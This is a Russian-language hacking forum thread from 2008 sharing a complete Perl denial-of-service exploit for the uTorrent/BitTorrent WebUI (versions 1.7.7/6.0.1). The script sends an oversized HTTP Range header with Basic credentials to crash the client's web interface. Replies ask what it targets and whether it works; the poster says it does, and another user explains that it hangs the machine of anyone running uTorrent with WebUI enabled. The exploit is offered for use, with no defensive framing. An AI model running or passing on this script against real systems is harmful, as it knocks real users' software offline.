Форумы uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit

Discussion in 'Уязвимости CMS/форумов' started by YoYo Factory, 29 Jun 2008.

  1. YoYo Factory

    YoYo Factory Elder - Старейшина

    Joined:
    24 Mar 2008
    Messages:
    108
    Likes Received:
    79
    Reputations:
    -5
    uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit

    Code:
    uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit 	
    
    #!/usr/bin/perl
    # uTorrent / BitTorrent  WebIU HTTP 1.7.7/6.0.1 Range header Denial of Service exploit
    # according to the following advisory: http://secunia.com/advisories/30605
    #
    # usage: WebUI-dos.pl <url> <port> <user:pass>
    # Exploit written by Exodus.
    # http://www.blackhat.org.il
    
    use IO::Socket;
    use MIME::Base64;
    
    if(@ARGV < 3)
    { &usage; }
    
    ($host,$ref) = split(/\//,$ARGV[0]);
    
    $sock = IO::Socket::INET->new(PeerAddr => "$host:$ARGV[1]", Proto =>'TCP') || die("[X]Couldnt connect to host: $host:$ARGV[1]\n");
    $buff = "E" x 60000;
    $up = encode_base64($ARGV[2]);
    chomp($up);
    
    print $sock "GET /gui/common.js HTTP/1.1\r\n".
    "Host: $host\r\n".
    "Authorization: Basic $up\r\n".
    "Range: bytes=$buff\r\n".
    "Connection: close\r\n\r\n";
    
    close($sock);
    
    print "[!]Payload sent, WebUI should be down...\n";
    
    
    
    sub usage
    {
    	print "usage $0 <url> <port> <user:pass>\n".
    		  "ex: $0 127.0.0.1/gui/common.js 1337 admin:admin\n";
    	exit;
    }
    
    © Astalavista.com

    Сорри если не туда запостил, переместите если не туда плиз!
     
  2. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    Можно описание поподробней,,,это ДоС уторрента ? или торрент трекера ?
     
  3. P(i)n*Fl0p1

    P(i)n*Fl0p1 Elder - Старейшина

    Joined:
    19 Dec 2006
    Messages:
    157
    Likes Received:
    35
    Reputations:
    9
    Эксплоит для поднятия ранга\репы на юторент трекерах?


    А работает ли?ты проверял сам?
     
  4. YoYo Factory

    YoYo Factory Elder - Старейшина

    Joined:
    24 Mar 2008
    Messages:
    108
    Likes Received:
    79
    Reputations:
    -5
    Написано же HTTP 1.7.7
     
  5. YoYo Factory

    YoYo Factory Elder - Старейшина

    Joined:
    24 Mar 2008
    Messages:
    108
    Likes Received:
    79
    Reputations:
    -5
    Перед тем как спрашивать лучше сам проверил бы! ;)
    Если выложил значит работает!
    Может кстати сейчас не будет, не знаю может админы прикрыл, но к тому моменту, когда создал тему, работала!
     
  6. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    вообще то если уж на то пошло, то это скрипт который подвешивает мащину юзера, на которой стоит uTorrent с WebUI (панель управления клиентом через веб)...